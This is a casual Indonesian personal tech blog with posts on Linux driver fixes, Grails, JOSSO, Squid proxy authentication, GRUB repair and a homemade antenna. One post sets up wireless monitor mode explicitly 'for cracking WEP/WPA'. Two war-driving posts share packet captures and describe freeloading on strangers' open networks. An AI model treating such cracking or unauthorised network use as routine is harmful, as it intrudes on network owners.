blog bangets deh!

Ubuntu 9.10 Karmic Koala on Lenovo G460... it's so painful...

2010-04-03T00:00:00.002+07:00

OK, got a new laptop yesterday... dah diinstal Ubuntu 9.10 Karmic ma oms anwar :D :D....

sampe rumah, pgn install2 buat develop kerjaan (Zend Studio 7.1.2, CrossOver, Netbeans, RapidSVN, dll) eeehhh 30 menit kemudian desktop ngaco tampilanna, ngefreeze... d*mn!!!!!...

gugel sana-sini akhirna nemu link menarik soal bug di karmic

Disini

dan

Disini

dan

Disini

OK, nyoba upgrade driver Nvidia ke 190, humm.. tetep ngefreeze.... still no solution...

Ada masalah baru, wifi sering diskonek (ouch....).. gugel sana sini, mang ada masalah di driver Atheros AR9285... dapet pencerahan pake driver compat-wireless...

LinuxWireless

Ganti driver yg lama, load driver baru... done... problem solved!..

Ya tinggal yg ngefreeze ini, kayakna perlu coba upgrade kernel ke 2.6.32 (current kernel : 2.6.31)... Karmic, U re so cute but painful too... :(

Introduction With GRAILS

2010-01-26T13:39:00.008+07:00

dah lama gk ngeblog.. iseng2 ajah update blog hehehehhee...

Grails is an open source web application framework which leverages the Groovy programming language (which is in turn based on the Java platform)

taken from wikipedia

GRAILS ini ya framework yg dasarna MVC... buat aq yg dulu pake cakePHP kurang lebih 11-12 ma Grails ini... Kalo di cakePHP ada si baker, utility untuk membuat view, controller secara langsung.. di GRAILS ini juga ada jadina gk usah repot2 ngoding ulang, tinggal ngoding buat entity databasena ajah :P

Apa ajah yg diperluin? berhubung ini si GRAILS berbasis Java ya tentuna pake JDK, aq pake JDK 1.6..

Download GRAILS dari sini , pilih yg stable ajah.. Saat tulisan ini dibuat masih versi 1.2 :D

Setelah di donlod, ekstrak n tempatin di C:\ (windows) atau ~/grails (linux), gk harus disitu juga sih, tapi kita ikutin ajah petunjuk instalansina :P. Setelah tu kita set enviroment variable (hal lumrah untuk yg berbasis Java :P) yaitu GRAILS_HOME, untuk windows settingan ini ada si System Properties, bisa dibuka dengan cara klik kanan di My Computer lalu pilih Properties, pilih tab Advanced lalu klik Enviroment Variables

Lalu lihat di bagian System Variabels, kalo belum ada JAVA_HOME, ya ditambahin dulu :P, klik New, lalu masukan JAVA_HOME untuk variable name dan lokasi JDK diinstal (ex: D:\program files\jdk1.6.0_012) untuk variable value na :D

Lakukan hal yg sama buat si GRAILS_HOME tapi tambahkan \bin untuk merujuk ke folder bin (ex : C:\grails-1.2.0\bin), abis itu tutup environment variable :D. Coba buka CMD (Command Prompt) lalu ketik grails, kalo dah ada kayak gambar dibawah maka kita siap ngoprek2 GRAILS :)

Taraaaaaaaa.. yuk kita nge-GRAILS hehehehhehe....

Untuk IDE sebenarna pake Notepad ato vim ajah dah cukup :P hehehhehe.. tapi kalo pgn lebih lengkap bisa pake Netbeans, Eclipse, IDEA ato Textmate :P sesuai selera ajah :). Aq pake netbeans 6.8 dengan plugin Groovy...

Enakna pake IDE kayak gini, dia udah otomatis bikinin folder2 n file yg diperluin buat dasar pengembangan aplikasi kita :), kalo di Netbeans tinggal pilih New Project, pilih Groovy lalu Groovy Application

Sebelumna kita cek dulu apakah si GRAILS dah dikenal ma si Netbeans, carana pilih Configure Groovy lalu cek apakah di bagian GRAILS HOME sudah benar merujuk ke lokasi installan GRAILS kita...

Kalo dah sesuai klik OK dan kita siap untuk coding :)

JOSSO + MySQL + TOMCAT 6.0 + PHP

2008-11-28T08:37:00.003+07:00

Setelah sekian lama vakum di dunia per-blog-an maka nyoba2 lagi aaahhh buat ngeblog :) n aq alamin sendiri kalo nyari2 tutorial JOSSO (selain dari situs resmina) itu sangat susah sekali n gk beginner-friendly :)

What is JOSSO?

JOSSO, or Java Open Single Sign-On, is an open source J2EE-based SSO infrastructure aimed to provide a solution for centralized, platform neutral, user authentication and authorization.

Taken from Josso Main Site

Intina, JOSSO digunakan untuk autentikasi secara sentral atau terpusat, misal aq punya beberapa web dimana tiap web memerlukan autentikasi. Maka dgn JOSSO kita dapat mudah mengimplementasikan SSO (single Sign On) di tiap web tersebut :)... SSO bisa diibaratkan "Sekali Login, bisa kemana aja" :)

OK, let's get it on....

What do u Need?
1. JOSSO new release (AFAIK saat ini sudah sampe versi 1.7), ambil dari Josso Main Site.
2. Apache Tomcat, disini aq pake versi 6.0.x ambil dari Apache Tomcat
3. MySQL Server, aq pake versi 5.0.x
4. PHP compiled with SOAP Disabled, ap pake versi 5.x
5. Java JDK >= 1.5
6. Mysql-connector.jar (Connector MySQL untuk JDBC, biasana dah include di java JDK)

Secara garis besar struktur yg akan dibangun adalah :

JOSSO Server (Tomcat 6.0) ========= Web server (Apache 2.x + PHP 5.x) ========= Database Server (MySQL 5.x)

Dengan skenario :

User login from web server ======== redirect to JOSSO Server ========= JOSSO server melakukan autentikasi ke Database Server ========= User valid? yes, redirect to web server

Proses Instalansi di JOSSO Server
Platform yg digunakan adalah Linux Ubuntu Server 8.04, pertama install terlebih dahulu java JDK dgn command :

# apt-get install sun-java6-jdk

Setelah terinstall dgn sukses, ekstrak file Tomcat6.0.

# tar -zxvf apache-tomcat-6.0.18.tar.gz

Setelah itu kita akan mensetting environment, sesuaikan path jvm dan tomcat sesuai system anda :

# export JAVA_HOME=/usr/lib/jvm/java-6-sun-1.6.0.07
# export CATALINA_HOME=/usr/lib/apache-tomcat-6.0.18

Ekstrak file JOSSO, masuk ke directory jossona.

# tar -zxvf josso-1.7.tar.gz
# cd josso-1.7/josso

Buat directory core/src/webapp/josso/WEB-INF/lib, Kopikan file mysql-connector.jar kedalam directory tadi

# mkdir core/src/webapp/josso/WEB-INF/lib
# cp /usr/share/java/mysql-connector-5.1.jar

Setelah itu kita build file war untuk josso,

# ./build.sh war

Maka akan tercipta 3 file war baru. Setelah itu install JOSSO

# ./build.sh install-tomcat60

Nantina akan di prompt sejumlah keterangan2 kayak proses compile :P... hehehehhe
Setelah Install Successful, kita perlu deploy JOSSO kedalam apache-tomcat60 TAPI dgn opsi untuk tidak mengikutsertakan file configurasi defaultnya (nanti kita akan bikin sendiri)

# ./build.sh -Dexclude.config=true deploy-tomcat60

Taraaaaa.... JOSSO dah berhasil di install di tomcat, selanjutnya tinggal mengkonfigurasi si JOSSO :) :) bersambung yaaaaa :P

Sony Ericsson w200i GPRS Modem with Ubuntu 7.10

2008-03-25T00:07:00.014+07:00

Ketika gk da sambungan internet (gratisan :P) tp pgn nge-net (chatting tentuna :P) binun juga... Kebetulan punya HP Sony Ericsson (baca: SonEr) w200i yg bisa GPRS-an (dah dicoba lsg :P), tp kalo dijadiin modem buat si lappie gimana ya?? Ternyata mang bisa, pake ppp (Point-to-Point Protocol) :) :) Kali ini aq coba pake Ubuntu 7.10.. yuuukkkkk :P

Pertama kita perlu install pppconfig dari repository Ubuntu na, boleh pake CD/DVD repo ato lsg onlen...

# apt-get update
# apt-get install pppconfig

Perintah update bakal meng-update package list dari repo yg kita pilih (lokal/internet), tyus yg kedua bakal install package pppconfig (biar lebih gampang konfigurasi ppp na :P)

Buzzz buzzz buzzz... setelah selesai diinstal, kita tancepin si SonEr pake kabel datana (Biasana kabel DKU-2 yang interfacena USB, serial juga bisa ko :P)... nah dari SonEr pilih modus telepon atau Phone Mode...

Untuk mengecek apa si HP dah konek dengan sukses di Ubuntu, bisa pake System Log, dari menu system (Menu paling atas di desktop :P) pilih Administration) pilih System Log. Setelah windows SYstem Log keluar, pilih Message dari menu paling kiri, cari kata2 seperti ini :

Disitu bisa kita liat kalo si SonEr terdetek di /dev/ttyACM0 atau /dev/ttyACM1. Catet atau apalin interface ini :P

Selanjutna kita konfigurasi ppp, buka terminal (menu Applications -> Accessories -> Terminal) tyus ketikin :

# pppconfig

Ntar muncul menu kayak gini :

Pilih Create a New connection, tyus masukin nama providerna (Bebas ko :P) contohna :

Setelah selesai, kita pilih DNS.. Pilih Dynamic DNS :

Pilih jenis Authentication, yaitu PAP :

Abis itu kita masukin username, kalo pake im3 usernamena gprs :

Menu selanjutna kita masukin passwordna, kalo pake im3 passwordna im3 :

Selanjutna pilih baud-rate, aq masukin 115200 disini :

Pilih Tone Dialing :

Masukin dial numberna, untuk GSM biasana *99***1#

Nahhh abis ini kita akan memilih interface buat si modem, masih inget kan interface SonEr diatas??? Pilih No untuk masukin secara manual, tyus ketik ajah interfacena (misal /dev/ttyACM0) :

Muncul menu konfirmasi, periksa kembali semua settingan.. kalo udah pilih Finish :

Keluar dari menu pppconfig tyus untuk jalanin ppp na kita buka Terminal lagi, ketikin :

# pon [nama_provider]

contoh :

Kalo berhasil konek, di System Log akan ada tulisan seperti ini :

Untuk matiinna pake perintah :

# poff [nama_provider]

Taraaaaaaaaaaaaaaaaaa... SonEr w200i telah berhasil menjadi modem di lappie :P :P

DLINK DWL G630 with Debian 4.0 Etch & BackTrack 2.0

2008-03-22T00:11:00.012+07:00

Hari ini aq beli WLan Card PCMIA buat si lappie, yaitu DLINK DWL G630 Rev.C2, WLan Card ini menggunakan chipset Atheros
AR5005G. Aq coba dengan menggunakan Backtrack 2.0, hasilnya sangat memuaskan. Berikut hasil dari perintah lspci :

# lspci

03:00.0 Ethernet controller: Atheros Communications, Inc. AR5005G 802.11abg NIC (rev 01)

WLan Card terdeteksi dengan baik. Tetapi untuk Debian, WLan Card ini lom terdeteksi dengan baik. Karena lom terinstall madwifi. Untuk mengatasina, aq perlu install madwifi ke Debian aq. Carana :

1. Edit terlebih dahulu file /etc/apt/sources.list, tambahkan alamat repository untuk binary dan source package (seandaina lom ada) :

# vi /etc/apt/sources.list

deb ftp://ftp.au.debian.org/debian stable main contrib non-free
deb-src ftp://ftp.au.debian.org/debian stable main contrib non-free

2. Jalankan aptitude update untuk mengupdate list package dari repository baru kita :

# apt-get update

3. install paket madwifi-source dan madwifi-tools :

# apt-get install madwifi-source
# apt-get install madwifi-tools

4. Jalankan modules-assistant untuk mengkonfigurasi module madwifi :

# m-a prepare
# m-a a-i madwifi

5. Akan tampil menu seperti ini :

Pilihlah SELECT untuk memilih module yang akan dikonfigurasi, lalu pilihlah module madwifi dengan menekan tombol spasi seperti ini :

Pilih Ok, lalu akan muncul menu lalu pilih BUILD, seperti ini :

Setelah module di build, pilih INSTALL untuk menginstal module kedalam kernel :

Tunggu sebentar sampai selesai, lalu pilih BACK dan keluar dari menu.

6. Setelah itu kita akan mengetes apakah module sudah terinstal dengan baik dengan perintah :

# modprobe ath_pci

Bila tidak ada error, kita bisa liat pada file syslog atau dmesg hasilnya :

ath_hal: 0.9.16.16 (AR5210, AR5211, AR5212, RF5111, RF5112, RF2413, RF5413)
wlan: 0.8.4.2 (svn 1451)
ath_rate_sample: 1.2 (svn 1451)
ath_pci: 0.9.4.5 (svn 1451)
ACPI: PCI Interrupt 0000:02:02.0[A] -> Link [LNKC] -> GSI 10 (level, low) -> IRQ 10
wifi0: 11b rates: 1Mbps 2Mbps 5.5Mbps 11Mbps
wifi0: 11g rates: 1Mbps 2Mbps 5.5Mbps 11Mbps 6Mbps 9Mbps 12Mbps 18Mbps 24Mbps 36Mbps 48Mbps 54Mbps
wifi0: H/W encryption support: WEP AES AES_CCM TKIP
wifi0: mac 5.6 phy 4.1 radio 1.7
wifi0: Use hw queue 1 for WME_AC_BE traffic
wifi0: Use hw queue 0 for WME_AC_BK traffic
wifi0: Use hw queue 2 for WME_AC_VI traffic
wifi0: Use hw queue 3 for WME_AC_VO traffic
wifi0: Use hw queue 8 for CAB traffic
wifi0: Use hw queue 9 for beacons
wifi0: Atheros 5212: mem=0xd0000000, irq=10

7. Kita tambahkan module agar bisa dijalankan via hotplug dengan perintah :

# echo ath_pci >> /etc/modules

Taraaaaaaaaaaaa.... sekarang si WLan Card sudah bisa digunakan di Debian :) :). Coba ketikan perintah iwconfig untuk melihat interface baru :

# iwconfig

wifi0 no wireless extensions.

ath0 unassociated ESSID:off/any
Mode:Managed Channel=0 Access Point: Not-Associated
Bit Rate:0 kb/s Tx-Power=20 dBm Sensitivity=8/0
Retry limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Dlink DWL G311v1 with Backtrack 3 BETA

2008-03-19T07:48:00.005+07:00

Beberapa waktu lalu aq beli WLan Card Netgear WG311v1. Kebetulan untuk versi 1 menggunakan chipset Atheros AR5212 (b/g).. Distro Backtrack 3 Beta aq jalanin Live CD, setelah boot n masuk KDE nyoba apakah si WG311 ini udah terdeteksi oleh Backtrack. Masuk ke console trus pake perintah :

# iwconfig

Ternyata si Backtrack udah terdeteksi dengan baik, ada 2 interface WLan yaitu wifi0 dan ath0 (athx biasana mang digunakan untuk interface dgn chipset Atheros). Tapi pas pgn jalanin Airodumo ato Aireplay ada error bahwa si WLan card blom pada mode Monitor. :( :(

Setelah Googling sana-sini akhirna menemukan solusi untuk menghidupkan mode monitor pada WG311 :) :). Carana masuk ke console trus pake perintah :

# ifconfig ath0 up
# wlanconfig ath1 create wlandev wifi0 wlanmode monitor
# ifconfig ath1 up
# ifconfig ath0 down

Perintah diatas akan membuat interface baru yaitu ath1 dengan mode monitor, selanjutna si WG311 dapat digunakan untuk Cracking WEP/WPA :) :)

Membuat Authentication untuk Proxy SQUID

2008-02-03T00:34:00.000+07:00

PErnah punya Proxy yang ingin dipakai oleh user tertentu saja?? Di Squid tersedia beberapa pilihan authentication yang bisa dipakai, diantarana :

=> NCSA: Uses an NCSA-style username and password file.
=> LDAP: Uses the Lightweight Directory Access Protocol
=> MSNT: Uses a Windows NT authentication domain.
=> PAM: Uses the Linux Pluggable Authentication Modules scheme.
=> SMB: Uses a SMB server like Windows NT or Samba.
=> getpwam: Uses the old-fashioned Unix password file.
=> SASL: Uses SALS libraries.
=> NTLM, Negotiate and Digest authentication

Kali ini aq coba bikin authentication dengan NCSA dengan Squid 2.6 STABLE 18.

Dengan asumsi proxy Squid sudah terinstal, maka kita perlu mengubah beberapa line di file /etc/squid/squid.conf. Tapi sebelumna kita perlu membuat file passwd yang isina nama user beserta passwordna dalam style NCSA. Masuk ke terminal dan ketikkan perintah :

# htpasswd /etc/squid/passwd usersquid

Perintah diatas berarti akan membuat file baru /etc/squid/passwd. Nanti ada prompt untuk memasukkan password si usersquid :

New password:
Re-type new password:
Adding password for user usersquid

Setelah itu kita harus tau dimana binary ncsa_auth disimpan :

# dpkg -L squid | grep nsca_auth

Hasilna :

/usr/lib/squid/ncsa_auth

atau dengan :

# rpm -ql squid | grep nsca_auth

hasilna :

/usr/lib/squid/ncsa_auth

Abis itu kita harus mengedit file konfigurasi si Squid di /etc/squid/squid.conf. Buka file tersebut dengan teks editor kesayangan :P lalu tambahin line2 berikut :

auth_param basic program /usr/lib/squid/ncsa_auth /etc/squid/passwd
auth_param basic children 5
auth_param basic realm Squid proxy-caching web server

Lalu cari bagian tag http_access dan tambahin ACL berikut :

acl ncsa_users proxy_auth REQUIRED
http_access allow ncsa_users

Restart service Squid, n coba setting proxy di Browser kita... nanti kalo bener akan ada prompt box seperti ini :

Hehehehhe, sekarang yg mo make proxy kita harus login terlebih dahulu :) :)

Install GRUB via Live CD Ubuntu

2008-02-02T18:56:00.000+07:00

Kemarin temen aq pgn install dual OS Windows - Linux.. tapi sayangna Linux duluan yg diinstal, setelah itu Windows.. Apa daya sang GRUB hilang dimakan ma Boot Loader Windows (huh!!! :P)...

OK, yg pertama dilakukan yaitu Boot dari CD Ubuntuna (ya iyalah, kalo gk gimana dunk :P)... Seperti biasa kita pilih Start or Install Ubuntu.. Tunggu ampe desktop si Ubuntu muncul... And then, jalanin Terminal.. kita ketikin perintah berikut :

$ sudo grub

Nanti kita akan masuk ke prompt si GRUB

grub>

Setelah itu kita nyari lokasi dari instalansi GRUB pertama kali dengan perintah :

grub> find /boot/grub/stage1

Hasilna adalah lokasi dimana GRUB diinstal, biasana bentukna kayak gini :

root(hdx,y)

Dimana x dan y adalah angka. Setelah itu ketikkan di prompt grubna sesuai dengan hasilna, misal kita dapat hasilna root(hd0,0), maka ketikkan :

grub> root(hd0,0)

Abis itu kita akan menginstall GRUB ke MBR hardisk kita dengan perintah :

grub> setup(hd0)

Kenapa hd0? diasumsikan hardisk kita adalah Primary.. :P Setelah itu nanti ada keterangan2 yang nunjukkin kalo GRUB dah terinstall dengan baik di MBR. kalo udah, kita keluar ajah dari prompt GRUB :

grub> quit

Taraaaaaaaaaaaa... si GRUB dengan sukses terinstall kembali di MBR Hardisk.. hehehhe sekarang tinggal nambahin option boot untuk si Windows..

Buka teks editor, bisa pake Kate, ato KWrite ato via terminal juga bisa (tergantung selera jah :P)...
Buka file /boot/grub/menu.lst, lalu tambahin line berikut di paling bawah :

title Windows XP
root (hd0,1)
makeactive
chainloader +1

Perhatikan line root (hd0,1), berarti partisi windows kita ada di partisi ke 2 (ditunjukkan angka 1) dan berada di Hardisk Primary (ditunjukkan oleh angka 0). Ubah nilai tersebut sesuai dengan kondisi yang ada :P... setelah itu reboot :

$ sudo reboot

Taraaaaaaa... setelah reboot kita akan dapat liaht menu GRUB dengan option boot untuk Linux n Windows :D :D

Back to Nature

2008-02-02T18:52:00.000+07:00

Waksss.... kasian Blog aq dah lama gk diupdate.. hehehehe karena disebabkan 1 n beberapa hal jadina kemarin2 malessss bgt update blog... tapi sekarang mulai yakin n niat tuk nge-blog lagi ... xixixixixixiixi thx kepada yg suka main ke blog aq walaupun lom diupdate :) :)

15th INDOCOMTECH 2007 - JCC

2007-11-18T09:09:00.000+07:00

INDOCOMTECH 2007 in Nov 14-18, will be occupying Hall A, Hall B, Cendrawasih and Plennary Hall at the Balai Sidang Jakarta Convention Center.

Kemarin hari sabtu, 17-nop-2007 aq n temen2 main ke pameran INDOCOMTECH di JCC. Begitu nyampe langsung nyari tempat buat duduk n buka si lappie. Hehehe biasa, pemburu hotspot gratisan :P. Pas dicari berapa AP yang aktif pake perintah "iwlist scan" , ternyata banyak juga :) (hasil scan dapat didonlod Disini atau Mirror).

Yang dateng lumayan banyak, karena selain pameran juga terdapat seminar n workshop yang diadakan setiap harina :). Aq sempet ngeliat2 n moto2 beberapa booth :) Ada booth yang menarik, yaitu robotika.

Untuk booth dari vendor hardware VGA, biasana disediakan PC Game yang bisa dicoba, kayak yang ini nih :

Kira2 berapa juta yah buat merakit PC Game seperti itu? T_T

Ada kegiatan workshop pas aq dateng, diantarana :

Ternyata ada booth CHIP juga loh! Yang dijual majalah2 CHIP dari tahun 2005 ampe yang baru, lumayan murah! :) :)

Tapi sayang sampe aq pulang gk da lomba2 dari booth. :( padahal pgn ikut sapa tau dapet Flashdisk ato Voucher makan :) :) hehehehhe :P

My Omni Antenna + si Biru (wrt54GL) :)

2007-10-21T20:56:00.000+07:00

Beberapa waktu lalu aq sempet bikin Antenna Omni Homemade bareng ma temen2 :). Kebetulan dapet referensi + video tutorialna dari VOIP Rakyat. Bahan n alat2na yang dipake buat antenna omni sih nyari ndiri, diantarana :

1. Pipa PVC ukuran 1.5" 2 meter
2. Kabel CNT-400 (RG-8) 2 meter
3. RP-TNC + N-Connector masing2 1 buah
4. Kapiler AC diameter 1 cm, 2 meter
5. Busa (busa kali ya? :P) pipa PVC 2 meter
6. Dop (bener gk ya namana?) pipa PVC 2 buah
7. Sekrup kecil, mur, lakban, lem perekat
8. Obeng, tang, solder (kalo bisa yg kayak di video itu, biar gampang nyatuin), gergaji, piso cutter, penggaris

Uhmm mungkin bahan yang agak mahal ada di kabel RG-8 dan konektorna, kemarin nyari di Glodok dapet per m itu sekitar 30 rebu dan konektorna ndiri 50 rebu per biji (mahal pa murah ya?). Untuk pipa kapiler + busana bisa nyari di toko yg jual peralatan AC. Bahan yang lain bisa didapet di toko bangunan.

Bagian yang agak susah menurut aq sih untuk menyatukan masing2 segmen (kabel yg dah dikuliti + diselubungi ma kapiler AC) dengan solder. Soalna kemarin ma temen2 juga rada kerepotan gimana nyolder yg bagus n baik hasilna. Tapi setelah beberapa kali ganti timah solder (baru tau kalo kualitasna beda2 :P) akhirna bisa nyatu juga :). Oiya, jumlah segmen yg dibuat sebanyak 25 segmen.

Untuk tempat si biru (wrt54GL) memakai box plastik makanan (murah meriah, 15000an :P). Dikasi fan kecil buat sirkulasi udara biar gk cepet panas :) hehehehe. Oiya, sempet nambahin indikator LED buat ngetahuin kondisi si biru. Yaitu LED Power, WAN, ma LAN. Aq sih nyolder kabel UTP sebanyak 1 pasang untuk masing2 LED di bagian kaki2 lampu LED si biru. Jadi garansina lsg angus, soalna dah dibuka casingna :( hehehehe

Berhubung si biru dah diinstallin DD-wrt V23 SP2, jadina tinggal milih antenna yang kanan (diliat dari bagian depan si biru) untuk menjadi Tx n Rx. :)

Taraaaa... jadi deh antenna omni n sibiru di"tangkringin" di tiang besi :) hehehhee... mudah2an ajah awet :P

Serangan Fajar! War Driving sekitar Rumah :)

2007-10-17T07:26:00.000+07:00

Humm pagi ini aq war driving sekitar rumah aq, pake motor n lappie :). Daerah yang "dijelajahi" meliputi Wijaya Kusuma, Bunga Rampai, Pondok Kelapa, Mawar Merah, Malaka, Buaran, dan Bintara. Hasilna lumayan banyak yg dapet, bahkan diantarana masih OPEN n DHCP, seperti di kampus Darma Persada n warnet di Pondok Kelapa. Yaudah ngenet gratisan bentar :P hehehhe. Beberapa diantarana mang mendapatkan sinyal yg kecil, mungkin karena faktor tinggina tower + jenis antenna yg dipake kali ya? Kalo yg pake antenna omni enak dapet sinyalna :)

Hasil war driving dapat didonlod disini atau mirror. Nama file *.txt merupakan tempat dimana dilakukan scanning. OS yang dipake buat war driving ini adalah Backtrack 2.0+ :) :) mudah2an bermanfaat :P hehehehe :)

Kebijakan Batas Tagih Speedy, Cara baru Telkom?

2007-10-15T11:20:00.000+07:00

Kebijakan Batas Tagih untuk Layanan Speedy Limited Volume Based
01 Oktober 2007 04:07:14 ( Sys Admin TSDC )

Mulai pemakaian September 2007 (tagihan Oktober 2007) batas tagihan maksimum untuk layanan Speedy limited volume based (Speedy Personal & Speedy Professional) yang mengalami overquota adalah sebesar Rp 1.200.000.
Dengan ketentuan ini maka tagihan yang harus dibayar pelanggan tidak akan melebihi angka tersebut. Batasan tagihan ini tidak akan mengurangi hak akses pelanggan, artinya pelanggan tetap masih dapat mengakses layanan Speedy walaupun sudah overquota.
Informasi lebih lanjut dapat menghubungi 147.

Sumber : https://portal.telkomspeedy.com/index.php?act=newsdetail&now=118&id=3

Menurut berita tsb berarti bagi pelanggan limited Telkom Speedy yang mengalami Over Quota (salah satu hal yang biasa n paling ditakuti :P) akan dipatok sampai 1.2 Jt saja. Dulu sering aq liat banyak pelanggan limited Speedy yang over quota, bahkan harus membayar > 2 Jt perbulanna. Kalo dipikir2 kenapa Telkom gak mengeluarkan kebijakan ini sebelom2na ya? Bayangkan bila dari program Speedy launching hingga kebijakan ini keluar berapa profit Telkom yang didapat dari hasil Over quota pelanggan2na? ck ck ck...

Dengan kata lain para pelanggan limited speedy akan mendapatkan akses Unlimited (no Quota) setelah membayar 1.2 Jt (wew... T_T). Aq sendiri juga bukanna tidak pernah over quota hehehehe :P

Kalo bisa sih tarif Speedy bisa lebih murah lagi, ya senggak2na sistem quota dihilangkan. :P hehehehe

Siemens S35i with my Lappie :P

2007-10-09T21:46:00.000+07:00

Masih punya HP ini? Aq sih masih :P hehehe HP yang lawas tapi masih "powerfull", dah ada irDa, WAP n tentuna ada kabel data RS-232na :P hehehe... OK, uji coba dilakukan di lappie (HP nw8240) aq dengan Debian Etch. Untuk berkomunikasi dengan si HP diperlukan aplikasi kecil, yaitu minicom. Pas aq install Debian sih lom ada :P jadina perlu apt-get install minicom dulu dah :)

Kalo dah terinstall, buka terminal/konsole ketikin minicom -s (kita setup duluw si minicom). Nanti ada menu kecil yg muncul kayak gini :

Pilih Serial Port Setup, nanti muncul menu lain :

Karena di lappie aq pasang kabel data di port serial pertama (mang satu2na :P) jadi dia pasti berada di /dev/ttyS0. Maka ubah Serial Device kalo lom bener dengan menekan tombol A dan mengubah nilai yang ada :P. Nah, si HP siemens s35i menggunakan Baudrate 19200, jadi perlu kita ubah juga Bps/Par/Bitsna, jadi tekan tombol E, nanti keluar lagi menu :

Pilih baudratena 19200 yaitu tombol F, nah urusan Parity, Stop Bits n Data Bits, kita pake 8N1, artina Data Bits = 8 bit, No parity dan Stop Bits = 1. Langsung tekan Q ajah :) tekna Enter buat kembali ke menu utama, kita simpan dulu konfigurasina biar gk capek2 setting lagi, pilih Save Setup as dfl :

Kalo udah, pilih Exit n kalo settingan kita dah bener maka langsung muncul :

Horeeee, akhirna kita bisa berkomunikasi ma si HP hehehehe :), trus apa ajah yg bisa kita lakuin disini? Banyaakkkk, tapi "ngobrol"na harus pake AT Command buat s35i :). Misal kita pengen liat inbox SMS kita (ALL ato semua), maka kita ketikin ajah AT Commandna : AT+CMGL=4 , 4 disini berarti nampilin semua SMS :

Nanti muncul dah bilangan2 Hexadesimal.. Duh apa artina? Ini namana format PDU (protocol description unit) Maaf ya isi inbox aq disensor :P hehehhehe :P

Uhmm, next project mungkin bagaimana kita bikin aplikasi kecil2an yg Read/Write ke port serial tuk ngambil n ngebaca SMS di inbox :) Doain ya biar cepet selese aplikasi sederhanana :).. :)

War Driving @ depok n mangga 2 :)

2007-10-04T19:50:00.000+07:00

Beberapa waktu lalu sempet nyoba2 war driving n packet capturing pake airodump-ng di Backtrack 2. Nyoba2 di kampus n jalanan sekitar margonda (pake mobilna si sarap :P).. hasilna lumayan, lumayan crowded maksudna :P hehehe, gk nyangka di jalan2 margonda ajah dah banyak betul sinyal2 wifi bertebaran.. :)

Terus kemarin juga sempet nyoba di mangga 2 mall, hasilna juga lumayan (sempet ngenet gratisan :P). Percobaan dilakukan di lantai 1 dekat pintu utama... Beberapa SSID ketangkep walaupun sinyalna kurang bagus, rata2 -70 dBm. Untuk hasil capture bisa di donlod disini atau mirror :) :)

My lappie with Debian Etch...

2007-10-04T19:32:00.000+07:00

Di postingan sebelomna pas aq instal debian etch terdapat masalah, yaitu tampilan yg flickering n gk bekerjana touchpad. Setelah nyari2 referensi, akhirna dapet solusina. Diharuskan edit file /etc/X11/xorg.conf, yg isina :

Section "Device"
Identifier "VESA Framebuffer"
Driver "vesa"
==== Cut Here ====

Pada awalna Driver yang ada bukanlah "vesa", jadi aq ganti menjadi vesa. Setelah itu tampilan pun kembali normal dan berhasil dijalankan hingga resolusi 1600x1200. Sebenarna si lappie dukung ampe 1920x1900, tapi entah mengapa ma si Xserverna cuman bisa sanggup ampe 1600x1200.

Untuk masalah touchpad ternyata harus mengedit file xorg.conf juga, yaitu :

Section "InputDevice"
Identifier "Mouse0"
Driver "synaptics"
Option "Device" "/dev/psaux"
Option "Protocol" "auto-dev"
Option "LeftEdge" "1700"
Option "RightEdge" "5300"
Option "TopEdge" "1700"
Option "BottomEdge" "4200"
Option "FingerLow" "25"
Option "FingerHigh" "30"
Option "MaxTapTime" "180"
Option "MaxTapMove" "220"
Option "VertScrollDelta" "100"
Option "MinSpeed" "0.06"
Option "MaxSpeed" "0.12"
Option "AccelFactor" "0.0010"
Option "SHMConfig" "on"
EndSection

Hehehe kebetulan aq juga pake mouse USB, jadina tinggal nambahin di file tsb :

Section "InputDevice"
Identifier "Mouse1"
Driver "mouse"
Option "Protocol" "auto"
Option "Device" "/dev/input/mice"
Option "ZAxisMapping" "4 5 6 7"
EndSection

Jadi untuk menggabungkan antara touchpad dengan Mouse USB :

Section "ServerLayout"
Screen "Screen 1"
InputDevice "Mouse0" "CorePointer" #Pointer utama, Touchpad
InputDevice "Mouse1" "SendCoreEvents" #Pointer kedua, mengirim event
InputDevice "Keyboard1" "CoreKeyboard"
EndSection

Mudah2an bagi yang mengalami masalah serupa bisa terselesaikan :) :)

My New (2nd Hand :P) Hp-Compaq NW8240

2007-09-22T08:15:00.001+07:00

Beberapa hari yang lalu aq membeli Lappie (baca: laptop) seken, ya lumayan murahlah buat Mhs.. Merekna Hp-Compaq NW8240... hehehe untuk spek bisa Googling ndiri ya :P....

Begitu sampe ke tangan, wewwwwwwwwww dah ada windows Vista Business Edition terinstall... Bagus sih dekstop n dll na.. tapi ni lappie pgn aq masukin pingu (baca: Linux).. Beberapa alternatif si pingu sih ada.. diantarana Ubuntu, Kubuntu, Debian, Backtrack n Slackware.

Pertama nyoba jalanin Ubuntu, boot dari CDna.. ampe menu pilihan Ubuntu masih lancar, tapi pas milih Start OR Install Ubuntu kok mandek?? :(

Akhirna coba Kubuntu, sama kayak si Ubuntu, tapi bedana dia lancar ampe mounting root file system doank :P selanjutna pingsan T_T

Uji coba lagi dengan menginstall Debian, lancarrrrrrrr truuussssss... tapi begitu muncul dekstop GNOMEna.. kok layarna Flickering (Berkedip2) mulu ya? kayakna masih ada masalah dengan XServerna.. untuk hal ini lom aq perbaikin, masih nyari referensi dari Google.

Slackware 11 diuji coba, install lancar, masuk Desktop KDE lancar, pas mo gerakin pointer, wakksss mandek, gk mo gerak :(( kayakna si slackware lom ada driver untuk Touchpad Synaptics (Mouse USB ajah gk kedetek T_T) padahal dah milih PS/2 untuk inputan mouse pada awal Setup..

Yowiss, akhirna coba jalanin si BackTrack 2 (baca: bt), wekkksss lancar oiiiii!!! akhirna si Backtrack menjadi sang penghuni lappie aq dengan didampingi Debian 4.0 n Slackware 11 :) :)

Moga2 lappie aq awet n si pingu betah didalemna :P :P hehehe

Untuk cara konfigurasi XServer n Touchpad nyusul ya :) :)

Software Freedom Days 2007 @ Universitas Budi Luhur

2007-09-15T19:35:00.000+07:00

